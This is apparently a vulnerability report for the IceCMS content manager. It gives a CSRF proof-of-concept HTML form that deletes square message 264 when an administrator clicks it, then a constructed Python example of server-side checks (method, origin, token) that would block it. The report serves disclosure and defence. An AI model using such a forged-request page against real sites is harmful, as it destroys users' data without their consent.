Thecosy/IceCMS

There is a CSRF vulnerability that can delete the message


After the administrator opens the following page and clicks the Submit request button, the square message with ID 264 will be deleted.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.129:8181/square/DelectSquareById/264">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
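
One way a server could refuse the request this form sends, as an added example that is not part of the original issue and is not IceCMS code: the delete route accepts only DELETE, and other state-changing requests need a same-origin source plus a per-session token. The trusted origin, the `X-CSRF-Token` header name, the route table and the sample requests are assumptions constructed for illustration.

```python
import hmac

# Assumed values for this sketch (constructed, not taken from IceCMS).
TRUSTED_ORIGIN = "http://cms.example.test:8181"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Hypothetical route table: path prefix -> the only HTTP method accepted for it.
STATE_CHANGING = {"/square/DelectSquareById/": "DELETE"}


def csrf_decision(method, path, headers, session_token):
    """Return (allowed, reason) for one request; headers is a plain dict."""
    method = method.upper()
    for prefix, required in STATE_CHANGING.items():
        if path.startswith(prefix) and method != required:
            # An HTML form can only send GET or POST, so the reported page stops here.
            return False, "method not allowed on state-changing route"
    if method in SAFE_METHODS:
        return True, "safe method"
    # Fetch metadata from current browsers; absent on older clients, so not the only check.
    if headers.get("Sec-Fetch-Site", "same-origin") != "same-origin":
        return False, "cross-site request"
    origin = headers.get("Origin")
    if origin is not None and origin != TRUSTED_ORIGIN:
        return False, "origin mismatch"
    sent = headers.get("X-CSRF-Token", "")
    if not session_token or not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample requests; the first mirrors what the form in the report sends.
TOKEN = "constructed-token-1f9c"
SAMPLES = [
    ("GET", "/square/DelectSquareById/264", {"Sec-Fetch-Site": "cross-site"}),
    ("DELETE", "/square/DelectSquareById/264",
     {"Sec-Fetch-Site": "cross-site", "Origin": "http://other.example.test"}),
    ("DELETE", "/square/DelectSquareById/264", {"Origin": TRUSTED_ORIGIN}),
    ("DELETE", "/square/DelectSquareById/264",
     {"Sec-Fetch-Site": "same-origin", "Origin": TRUSTED_ORIGIN, "X-CSRF-Token": TOKEN}),
]

if __name__ == "__main__":
    for method, path, headers in SAMPLES:
        print(method, path, csrf_decision(method, path, headers, TOKEN))
```

A GET form navigation normally carries no `Origin` header, so an Origin comparison alone would not reject the first sample; the method restriction is what stops it.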